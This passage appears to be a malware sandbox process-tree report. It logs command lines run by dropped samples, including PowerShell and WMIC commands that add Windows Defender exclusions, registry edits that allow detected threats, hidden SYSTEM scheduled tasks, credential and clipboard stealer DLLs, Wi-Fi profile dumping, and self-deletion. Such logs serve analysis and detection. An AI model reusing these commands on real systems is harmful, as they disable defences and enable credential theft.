C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:5268
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:1748
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:3712
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:6136
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 23:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe\" Wt /iyIdidkKWA 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:7144 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵PID:1344
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵PID:6424
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵PID:6428
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:1852 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5140 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:5176
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\938118698296_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵PID:5720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵PID:5420
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:5728 -
C:\Windows\system32\svchost.exesvchost.exe3⤵PID:5812
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵PID:1860
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:2544
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1748
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵PID:3312
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵PID:4952
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:3096
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵PID:5624
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"4⤵PID:5540
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000242001\loader.exe"3⤵PID:5256
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:2956
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
PID:1116 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5848
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2712 -ip 27121⤵PID:3684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4328 -ip 43281⤵PID:456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 328 -ip 3281⤵PID:1068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5460 -ip 54601⤵PID:5996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2808
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2888
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:2016
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵PID:1028
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:6032
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=01⤵PID:2532
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x250,0x254,0x258,0x230,0x25c,0xa26038,0xa26044,0xa260502⤵PID:1468
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"2⤵PID:1800
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream3⤵PID:6116
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b4,0x2b8,0x2bc,0x2b0,0x2c0,0x7ff994ade650,0x7ff994ade660,0x7ff994ade6704⤵PID:5820
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser1⤵PID:6760
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade6702⤵PID:6796
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=1880 /prefetch:22⤵PID:6996
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2004,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:32⤵PID:7016
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2292,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:82⤵PID:7116
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2704,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:82⤵PID:3096
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3080,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3140 /prefetch:82⤵PID:6160
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3096,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:82⤵PID:5708
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3112,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3372 /prefetch:82⤵PID:3384
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=3120,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:82⤵PID:5504
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3788,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:12⤵PID:6344
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3804,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:12⤵PID:6356
-
C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe Wt /iyIdidkKWA 385118 /S1⤵PID:6468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3920
-
